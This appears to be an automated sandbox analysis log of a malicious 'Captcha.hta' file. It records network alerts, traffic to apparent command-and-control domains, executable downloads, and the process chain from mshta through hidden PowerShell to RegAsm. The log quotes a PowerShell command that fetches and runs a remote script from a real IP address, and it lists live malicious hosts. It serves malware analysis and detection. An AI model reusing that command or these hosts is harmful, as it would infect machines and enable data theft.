              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49734 -> 147.45.44.131:80
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YPG1TIB3SUIY02Y203Y | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18169 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=G2LZBTFA26935Y | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8760 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Z4TTJ1VUF4OCQR1DRE5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20443 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=442XREIEZD5L | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1233 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=T3IXJXPW7E9RKTS2P7E | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 583787 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 82 | Host: covery-mover.biz
              Source: global traffic | HTTP traffic detected: GET /tbhy.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 45.131.135.227 | Connection: Keep-Alive
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: global traffic | HTTP traffic detected: GET /tbhy.ps1 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: 45.131.135.227
                  Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /infopage/bhg8.exe HTTP/1.1
                  X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                  Host: 147.45.44.131
                  Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1
                  X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                  Host: 147.45.44.131
              Source: global traffic | DNS traffic detected: DNS query: zinc-sneark.biz
              Source: global traffic | DNS traffic detected: DNS query: se-blurry.biz
              Source: global traffic | DNS traffic detected: DNS query: dwell-exclaim.biz
              Source: global traffic | DNS traffic detected: DNS query: formy-spill.biz
              Source: global traffic | DNS traffic detected: DNS query: covery-mover.biz
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: covery-mover.biz
              Source: powershell.exe, 00000001.00000002.1781632412.000000000546C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/bhg8.exe
              Source: powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/ung0.exe
              Source: mshta.exe, 00000000.00000003.1679927373.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1680851940.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1677082981.0000000000829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1676018400.000000000081E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.131.135.227
              Source: powershell.exe, 00000001.00000002.1791197729.0000000007550000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.131.135.227/tbhy.ps1
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.131.138
              Source: svchost.exe, 00000003.00000002.2911202163.0000027EE4A11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C6D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.3.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/D
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/api
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/apia
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/apid
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/apie.
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz:443/api
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1781632412.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_00431A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,7_2_00431BB0

              System Summary

              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 1.2.powershell.exe.55e2b80.2.raw.unpack, Sap.cs | Long String: Length: 18812
              Source: 1.2.powershell.exe.55cc700.1.raw.unpack, Sap.cs | Long String: Length: 18812
              Source: 1.2.powershell.exe.77d0000.4.raw.unpack, Sap.cs | Long String: Length: 18812
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00414A30 appears 76 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00408000 appears 52 times
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 1.2.powershell.exe.55e2b80.2.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 1.2.powershell.exe.55cc700.1.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 1.2.powershell.exe.77d0000.4.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@13/18@5/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,7_2_00436F90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ora4veg.tut.ps1
              Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Captcha.hta | ReversingLabs: Detection: 13%
              Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
